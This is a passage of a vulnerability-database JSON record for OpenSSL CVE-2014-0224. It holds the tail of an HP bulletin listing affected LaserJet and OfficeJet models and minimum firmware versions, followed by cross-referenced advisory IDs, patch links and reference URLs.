CC420A, CC421A\n v 2302963_436067 (or higher)\n\nHP Color LaserJet CP5525\n CE707A,CE708A,CE709A\n v 2302963_436070 (or higher)\n\nHP Color LaserJet Enterprise M750\n D3L08A, D3L09A, D3L10A\n v 2302963_436077 (or higher)\n\nHP Color LaserJet M651\n CZ255A, CZ256A, CZ257A, CZ258A\n v 2302963_436073 (or higher)\n\nHP Color LaserJet M680\n CZ248A, CZ249A\n v 2302963_436072 (or higher)\n\nHP Color LaserJet Flow M680\n CZ250A, CA251A\n v 2302963_436072 (or higher)\n\nHP LaserJet Enterprise 500 color MFP M575dn\n CD644A, CD645A\n v 2302963_436081 (or higher)\n\nHP LaserJet Enterprise 500 MFP M525f\n CF116A, CF117A\n v 2302963_436069 (or higher)\n\nHP LaserJet Enterprise 600 M601 Series\n CE989A, CE990A\n v 2302963_436082 (or higher)\n\nHP LaserJet Enterprise 600 M602 Series\n CE991A, CE992A, CE993A\n v 2302963_436082 (or higher)\n\nHP LaserJet Enterprise 600 M603 Series\n CE994A, CE995A, CE996A\n v 2302963_436082 (or higher)\n\nHP LaserJet Enterprise MFP M630 series\n B3G84A, B3G85A, B3G86A, J7X28A\n v 2303714_233000041 (or higher)\n\nHP LaserJet Enterprise 700 color M775 series\n CC522A, CC523A, CC524A, CF304A\n v 2302963_436079 (or higher)\n\nHP LaserJet Enterprise 700 M712 series\n CF235A, CF236A, CF238A\n v 2302963_436080 (or higher)\n\nHP LaserJet Enterprise 800 color M855\n A2W77A, A2W78A, A2W79A\n v 2302963_436076 (or higher)\n\nHP LaserJet Enterprise 800 color MFP M880\n A2W76A, A2W75A, D7P70A, D7P71A\n v 2302963_436068 (or higher)\n\nHP LaserJet Enterprise Color 500 M551 Series\n CF081A,CF082A,CF083A\n v 2302963_436083 (or higher)\n\nHP LaserJet Enterprise color flow MFP M575c\n CD646A\n v 2302963_436081 (or higher)\n\nHP LaserJet Enterprise flow M830z MFP\n CF367A\n v 2302963_436071 (or higher)\n\nHP LaserJet Enterprise flow MFP M525c\n CF118A\n v 2302963_436069 (or higher)\n\nHP LaserJet Enterprise M4555 MFP\n CE502A,CE503A, CE504A, CE738A\n v 2302963_436064 (or higher)\n\nHP LaserJet Enterprise M806\n CZ244A, CZ245A\n v 2302963_436075 (or higher)\n\nHP LaserJet Enterprise MFP M725\n CF066A, CF067A, CF068A, CF069A\n v 2302963_436078 (or higher)\n\nHP Scanjet Enterprise 8500 Document Capture Workstation\n L2717A, L2719A\n v 2302963_436065 (or higher)\n\nOfficeJet Enterprise Color MFP X585\n B5L04A, B5L05A,B5L07A\n v 2302963_436066 (or higher)\n\nOfficeJet Enterprise Color X555\n C2S11A, C2S12A\n v 2302963_436074 (or higher)\n\nHP Color LaserJet CP3525\n CC468A, CC469A, CC470A, CC471A\n v 06.183.1 (or higher)\n\nHP LaserJet M4345 Multifunction Printer\n CB425A, CB426A, CB427A, CB428A\n v 48.306.1 (or higher)\n\nHP LaserJet M5025 Multifunction Printer\n Q7840A\n v 48.306.1 (or higher)\n\nHP Color LaserJet CM6040 Multifunction Printer\n Q3938A, Q3939A\n v 52.256.1 (or higher)\n\nHP Color LaserJet Enterprise CP4525\n CC493A, CC494A, CC495A\n v 07.164.1 (or higher)\n\nHP Color LaserJet Enterprise CP4025\n CC489A, CC490A\n v 07.164.1 (or higher)\n\nHP LaserJet M5035 Multifunction Printer\n Q7829A, Q7830A, Q7831A\n v 48.306.1 (or higher)\n\nHP LaserJet M9050 Multifunction Printer\n CC395A\n v 51.256.1 (or higher)\n\nHP LaserJet M9040 Multifunction Printer\n CC394A\n v 51.256.1 (or higher)\n\nHP Color LaserJet CM4730 Multifunction Printer\n CB480A, CB481A, CB482A, CB483A\n v 50.286.1 (or higher)\n\nHP LaserJet M3035 Multifunction Printer\n CB414A, CB415A, CC476A, CC477A\n v 48.306.1 (or higher)\n\nHP 9250c Digital Sender\n CB472A\n v 48.293.1 (or higher)\n\nHP LaserJet Enterprise P3015\n CE525A,CE526A,CE527A,CE528A,CE595A\n v 07.186.1 (or higher)\n\nHP LaserJet M3027 Multifunction Printer\n CB416A, CC479A\n v 48.306.1 (or higher)\n\nHP LaserJet CM3530 Multifunction Printer\n CC519A, CC520A\n v 53.236.1 (or higher)\n\nHP Color LaserJet CP6015\n Q3931A, Q3932A, Q3933A, Q3934A, Q3935A\n v 04.203.1 (or higher)\n\nHP LaserJet P4515\n CB514A,CB515A, CB516A, CB517A\n v 04.213.1 (or higher)\n\nHP Color LaserJet CM6030 Multifunction Printer\n CE664A, CE665A\n v 52.256.1 (or higher)\n\nHP LaserJet P4015\n CB509A, CB526A, CB511A, CB510A\n v 04.213.1 (or higher)\n\nHP LaserJet P4014\n CB507A, CB506A, CB512A\n v 04.213.1 (or higher)\n\nHISTORY\nVersion:1 (rev.1) - 22 September 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0224"
      },
      {
        "db": "BID",
        "id": "67899"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-0224"
      },
      {
        "db": "PACKETSTORM",
        "id": "127936"
      },
      {
        "db": "PACKETSTORM",
        "id": "127166"
      },
      {
        "db": "PACKETSTORM",
        "id": "127630"
      },
      {
        "db": "PACKETSTORM",
        "id": "127422"
      },
      {
        "db": "PACKETSTORM",
        "id": "127403"
      },
      {
        "db": "PACKETSTORM",
        "id": "127190"
      },
      {
        "db": "PACKETSTORM",
        "id": "128345"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-0224",
        "trust": 2.7
      },
      {
        "db": "JUNIPER",
        "id": "JSA10629",
        "trust": 1.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#978508",
        "trust": 1.9
      },
      {
        "db": "MCAFEE",
        "id": "SB10075",
        "trust": 1.9
      },
      {
        "db": "SECUNIA",
        "id": "59824",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59310",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59380",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59661",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59162",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59666",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59191",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59188",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60176",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59375",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59101",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59441",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59163",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59142",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59126",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59186",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60567",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59189",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59437",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59445",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58639",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59282",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59132",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59506",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59383",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59135",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59342",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59659",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59364",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58492",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60066",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58337",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60571",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59192",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58667",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59223",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59004",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59459",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59990",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59214",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59338",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59438",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59429",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59287",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60577",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59530",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59448",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58759",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59012",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59894",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59175",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59055",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59669",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59368",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59518",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58714",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58716",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60049",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59043",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59655",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59878",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59370",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59449",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59435",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59491",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59495",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59514",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59120",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58579",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59721",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59529",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59284",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59389",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58745",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59167",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58128",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58977",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59442",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59040",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58939",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59784",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59093",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59454",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59885",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58660",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59460",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59354",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58743",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59362",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58945",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59446",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59602",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59305",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58433",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59502",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59374",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59264",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59528",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58713",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59325",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59450",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58385",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60819",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59525",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59490",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59231",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59365",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "61254",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59301",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59440",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59202",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59451",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59190",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59447",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59589",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60522",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58742",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59677",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59300",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59306",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "61815",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59413",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59483",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59063",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58719",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59444",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59211",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59827",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59215",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59347",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58930",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59916",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "58615",
        "trust": 1.6
      },
      {
        "db": "SIEMENS",
        "id": "SSA-234763",
        "trust": 1.6
      },
      {
        "db": "SECTRACK",
        "id": "1031594",
        "trust": 1.6
      },
      {
        "db": "SECTRACK",
        "id": "1031032",
        "trust": 1.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4645",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0696",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-24443",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-080",
        "trust": 0.6
      },
      {
        "db": "DLINK",
        "id": "SAP10045",
        "trust": 0.3
      },
      {
        "db": "DLINK",
        "id": "SAP10046",
        "trust": 0.3
      },
      {
        "db": "JUNIPER",
        "id": "JSA10643",
        "trust": 0.3
      },
      {
        "db": "JUNIPER",
        "id": "JSA10659",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-17-094-04",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-198-03F",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-198-03G",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-198-03B",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-198-03C",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-198-03",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-198-03D",
        "trust": 0.3
      },
      {
        "db": "JVN",
        "id": "JVN61247051",
        "trust": 0.3
      },
      {
        "db": "BID",
        "id": "67899",
        "trust": 0.3
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-0224",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127936",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127166",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127630",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127422",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127403",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127190",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128345",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-0224"
      },
      {
        "db": "BID",
        "id": "67899"
      },
      {
        "db": "PACKETSTORM",
        "id": "127936"
      },
      {
        "db": "PACKETSTORM",
        "id": "127166"
      },
      {
        "db": "PACKETSTORM",
        "id": "127630"
      },
      {
        "db": "PACKETSTORM",
        "id": "127422"
      },
      {
        "db": "PACKETSTORM",
        "id": "127403"
      },
      {
        "db": "PACKETSTORM",
        "id": "127190"
      },
      {
        "db": "PACKETSTORM",
        "id": "128345"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-080"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0224"
      }
    ]
  },
  "id": "VAR-201406-0445",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.4594171644
  },
  "last_update_date": "2024-07-23T21:30:24.345000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "openssl-1.0.1h",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51081"
      },
      {
        "title": "openssl-1.0.0m",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51080"
      },
      {
        "title": "openssl-0.9.8za",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51079"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2014-351",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-351"
      },
      {
        "title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03107 rev.3  -  Certain HP LaserJet Printers, MFPs and Certain HP OfficeJet Enterprise Printers using OpenSSL, Remote Unauthorized Access",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=d0eef6c81e529a1b8e4ea4b72eaef4d0"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2014-350",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-350"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=b92b65104373bc8476811ff1b99cd369"
      },
      {
        "title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03107 rev.3  -  Certain HP LaserJet Printers, MFPs and Certain HP OfficeJet Enterprise Printers using OpenSSL, Remote Unauthorized Access",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=a7d1e620ea07a6fd4d3ec24012763337"
      },
      {
        "title": "Red Hat: CVE-2014-0224",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-0224"
      },
      {
        "title": "Ubuntu Security Notice: openssl regression",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-3"
      },
      {
        "title": "HP: HPSBPI03107 rev.3  -  Certain HP LaserJet Printers, MFPs and Certain HP OfficeJet Enterprise Printers using OpenSSL, Remote Unauthorized Access",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=hpsbpi03107"
      },
      {
        "title": "Ubuntu Security Notice: openssl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-4"
      },
      {
        "title": "Ubuntu Security Notice: openssl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-1"
      },
      {
        "title": "Ubuntu Security Notice: openssl regression",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-2"
      },
      {
        "title": "Debian Security Advisories: DSA-2950-1 openssl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=909292f2afe623fbec51f7ab6b32f790"
      },
      {
        "title": "Debian CVElist Bug Report Logs: openssl: CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=07d14df4883f21063a053cea8d2239c6"
      },
      {
        "title": "Tenable Security Advisories: [R8] Tenable Products Affected by OpenSSL \u0027CCS Injection\u0027 Vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2014-03"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2014-349",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-349"
      },
      {
        "title": "Debian CVElist Bug Report Logs: virtualbox: CVE-2014-6588 CVE-2014-6589 CVE-2014-6590 CVE-2014-6595 CVE-2015-0418 CVE-2015-0427",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=eee4d8c3e2b11de5b15ee65d96af6c60"
      },
      {
        "title": "Symantec Security Advisories: SA80 : OpenSSL Security Advisory 05-Jun-2014",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=dd4667746d163d08265dfdd4c98e4201"
      },
      {
        "title": "Citrix Security Bulletins: Citrix Security Advisory for OpenSSL Vulnerabilities (June 2014)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=afbd3a710e98424e558b1b21482abad6"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2014-0224 "
      },
      {
        "title": "crochet-technologies",
        "trust": 0.1,
        "url": "https://github.com/crochet-technology/crochet-technologies "
      },
      {
        "title": "openssl-ccs-cve-2014-0224",
        "trust": 0.1,
        "url": "https://github.com/ssllabs/openssl-ccs-cve-2014-0224 "
      },
      {
        "title": "android-development-best-practices",
        "trust": 0.1,
        "url": "https://github.com/niharika2810/android-development-best-practices "
      },
      {
        "title": "ssl-grader",
        "trust": 0.1,
        "url": "https://github.com/sslyze410-sslgrader-wciphersuite-info/ssl-grader "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/dtarnawsky/capacitor-plugin-security-provider "
      },
      {
        "title": "qualysparser",
        "trust": 0.1,
        "url": "https://github.com/pr4jwal/qualysparser "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/wanderwille/13.01 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-0224"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-080"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-326",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0224"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://support.citrix.com/article/ctx140876"
      },
      {
        "trust": 2.5,
        "url": "http://www.vmware.com/security/advisories/vmsa-2014-0006.html"
      },
      {
        "trust": 2.2,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676615"
      },
      {
        "trust": 2.2,
        "url": "http://www.ibm.com/support/docview.wss?uid=swg21676793"
      },
      {
        "trust": 2.2,
        "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1020948"
      },
      {
        "trust": 2.2,
        "url": "http://www.ibm.com/support/docview.wss?uid=swg1it02314"
      },
      {
        "trust": 2.2,
        "url": "http://www.ibm.com/support/docview.wss?uid=swg21676877"
      },
      {
        "trust": 2.2,
        "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html"
      },
      {
        "trust": 2.2,
        "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345106.htm"
      },
      {
        "trust": 2.2,
        "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004678"
      },
      {
        "trust": 2.2,
        "url": "http://www.ibm.com/support/docview.wss?uid=swg21676356"
      },
      {
        "trust": 2.2,
        "url": "http://www.ibm.com/support/docview.wss?uid=swg24037783"
      },
      {
        "trust": 2.0,
        "url": "http://www.openssl.org/news/secadv_20140605.txt"
      },
      {
        "trust": 1.9,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=kb29217"
      },
      {
        "trust": 1.9,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629"
      },
      {
        "trust": 1.9,
        "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_0224_cryptographic_issues1"
      },
      {
        "trust": 1.9,
        "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_0224_cryptographic_issues"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678167"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678233"
      },
      {
        "trust": 1.9,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=kb29195"
      },
      {
        "trust": 1.9,
        "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15325.html"
      },
      {
        "trust": 1.9,
        "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory9.asc"
      },
      {
        "trust": 1.9,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "trust": 1.9,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "trust": 1.9,
        "url": "http://www.f-secure.com/en/web/labs_global/fsc-2014-6"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037730"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037727"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676655"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675821"
      },
      {
